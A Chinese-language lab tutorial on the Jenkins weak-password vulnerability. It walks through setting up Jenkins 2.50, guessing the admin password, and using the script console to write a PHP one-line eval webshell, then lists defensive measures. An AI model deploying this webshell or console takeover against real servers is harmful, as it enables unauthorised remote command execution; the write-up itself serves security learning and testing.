jenkins弱口令漏洞


jenkins弱口令漏洞

一、漏洞描述

通过暴力破解管理控制台,如果爆破成功,可获得后台管理权限。操作后台,后台可通过脚本命令行功能执行系统命令,如反弹shell等,低权限可以通过创建控制台输出方式执行命令。

二、漏洞环境搭建

1、 官方下载jenkins-2.50-1.1.noarch.rpm,下载地址: http://mirrors.jenkins.io

2、在redhat6.5上安装jenkins

2.1、使用rpm安装

rpm -ivh jenkins-2.50-1.1.noarch.rpm

  

2.2、启动服务

  

2.3、浏览器访问http://192.168.10.137:8080,如下图所示需要输入密码,密码文件在如下图位置

   

2.4查看密码文件,输入密码后进入如下界面,选择安装建议的插件

  

2.5、安装完插件之后,进入如下界面,设置用户名和密码

  

2.6、设置完用户和密码之后,进入如下界面,点击如下图位置,到此为止,jenkins环境搭建成功

  

   

三、漏洞复现

1、浏览器访问http://192.168.10.137:8080

  

2、猜解出密码,然后登录,点击”系统管理”

  

3、选择如下图所示

  

4、利用”脚本命令行”上传webshell,内容如下:

new File("/var/www/html/media.php").write('<?php @eval($_POST[cmd]);?>');

  

5、点击“运行”,没有报错,上传成功

6、菜刀连接

  

四、漏洞防御

1、增强后台密码强度

2、后台不对外开放

 

-------------------------------------------------------------------------------

参考链接:https://www.secpulse.com/archives/2166.html


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM